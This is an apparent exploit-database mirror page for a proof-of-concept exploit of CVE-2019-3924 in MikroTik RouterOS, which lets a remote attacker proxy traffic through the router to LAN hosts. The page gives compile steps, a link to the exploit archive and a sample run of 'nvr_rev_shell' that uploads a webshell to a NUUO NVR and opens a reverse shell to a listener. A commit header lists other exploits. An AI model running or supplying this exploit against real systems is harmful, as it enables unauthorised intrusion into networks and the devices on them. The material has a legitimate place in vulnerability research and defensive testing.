bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/remote/46444.txt
Offensive Security f7381cfe15 DB: 2019-02-22 
9 changes to exploits/shellcodes

Valentina Studio 9.0.5 Linux - 'Host' Buffer Overflow (PoC)
Virtual VCR Max .0a - '.vcr' Buffer Overflow (PoC)
ScreenStream 3.0.15 - Denial of Service
AirDrop 2.0 - Denial of Service (DoS)

RealTerm Serial Terminal 2.0.0.70 - 'Echo Port' Buffer Overflow (SEH)

Memu Play 6.0.7 - Privilege Escalation

MikroTik RouterOS < 6.43.12 (stable) / < 6.42.12 (long-term) - Firewall and NAT Bypass

C4G Basic Laboratory Information System (BLIS) 3.4 - SQL Injection

EI-Tube 3 - SQL Injection
2019-02-22 05:01:55 +00:00

44 lines
No EOL
1.4 KiB
Text
Raw Blame History

# CVE-2019-3924
A remote, unauthenticated attacker can proxy traffic through RouterOS via probes sent to the agent binary. This PoC demonstrates how to exploit a LAN host from the WAN. A video demonstrating the attack can be found here:
* https://www.youtube.com/watch?v=CxyOtsNVgFg
A Tenable Research Advisory for the vulnerability can be found here:
* https://www.tenable.com/security/research/tra-2019-07
## Compilation
This code was tested on Ubuntu 18.04. There is a dependency on boost, gtest, and cmake. Simply install them like so:
```sh
sudo apt install libboost-dev cmake
```
To compile simply do the following:
```sh
cd routeros/poc/cve_2019_3924/
mkdir build
cd build
cmake ..
```
## Sample Usage
```sh
albinolobster@ubuntu:~/routeros/poc/cve_2019_3924/build$ ./nvr_rev_shell --proxy_ip 192.168.1.70 --proxy_port 8291 --target_ip 10.0.0.252 --target_port 80 --listening_ip 192.168.1.7 --listening_port 1270
[!] Running in exploitation mode
[+] Attempting to connect to a MikroTik router at 192.168.1.70:8291
[+] Connected!
[+] Looking for a NUUO NVR at 10.0.0.252:80
[+] Found a NUUO NVR!
[+] Uploading a webshell
[+] Executing a reverse shell to 192.168.1.7:1270
[+] Done!
albinolobster@ubuntu:~/routeros/poc/cve_2019_3924/build$
```
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46444.zip
Reference in a new issue View git blame Copy permalink